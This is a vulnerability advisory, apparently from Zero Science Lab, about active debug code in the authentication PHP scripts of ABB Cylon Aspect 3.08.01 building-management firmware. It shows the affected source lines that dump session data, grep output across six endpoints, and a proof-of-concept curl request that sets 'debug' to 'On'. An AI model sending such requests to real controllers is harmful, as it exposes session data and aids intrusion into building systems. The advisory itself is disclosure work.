Headline
ABB Cylon Aspect 3.08.01 Active Debug Data Exposure
ABB Cylon Aspect version 3.08.01 is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information.
ABB Cylon Aspect 3.08.01 (auth/) Active Debug Code VulnerabilityVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: 3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller is deployed to unauthorized actors with debuggingcode still enabled or active, which can create unintended entry points or exposesensitive information.Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscienceAdvisory ID: ZSL-2024-5851Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5851.phpCWE ID: 489CWE URL: https://cwe.mitre.org/data/definitions/489.html21.04.2024--$ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ ./db_list.sh ../[*] DEBUG enabled for:/htmlroot/auth/changePassword.php/htmlroot/auth/checkPassword.php/htmlroot/auth/passwordRules.php/htmlroot/auth/sessionCreate.php/htmlroot/auth/sessionLogout.php/htmlroot/auth/sessionValidate.php$ head -n 12 auth/changePassword.php | cat -n 1 <?php 2 $post = (empty($_POST)) ? json_decode(file_get_contents('php://input'), true) : $_POST; 3 4 $debug = (isset($post['debug']) && $post['debug'] === 'On'); 5 6 if ($debug) { 7 ini_set('display_startup_errors', 1); 8 ini_set('display_errors', 1); 9 error_reporting(-1); 10 } 11 12 session_start();$ cat auth/changePassword.php | grep 84 84 if (debug) $data->_SESSION = $_SESSION;$ grep -irnHE "debug)|debug )" auth/*.phpauth/changePassword.php:6:if ($debug) {auth/changePassword.php:84:if ($debug) $data->_SESSION = $_SESSION;auth/checkPassword.php:6:if ($debug) {auth/checkPassword.php:54:if ($debug) $data->_SESSION = $_SESSION;auth/passwordRules.php:6:if ($debug) {auth/passwordRules.php:36:if ($debug) $data->_SESSION = $_SESSION;auth/sessionCreate.php:6:if ($debug) {auth/sessionCreate.php:57:if ($debug) $data->_SESSION = $_SESSION;auth/sessionLogout.php:6:if ($debug) {auth/sessionLogout.php:31:if( $debug ) $data->_SESSION = $_SESSION;auth/sessionValidate.php:6:if ($debug) {auth/sessionValidate.php:45:if( $debug ) $data->_SESSION = $_SESSION;$ curl -X POST "http://192.168.73.31/auth/changePassword.php" \> -d "{\> \"appid\":\"1\",\> \"user\":\"teppei\",\> \"oldpass\":\"123456\",\> \"newpass\":\"654321\",\> \"forcelogout\":\"?\",\> \"debug\":\"On\"\> }"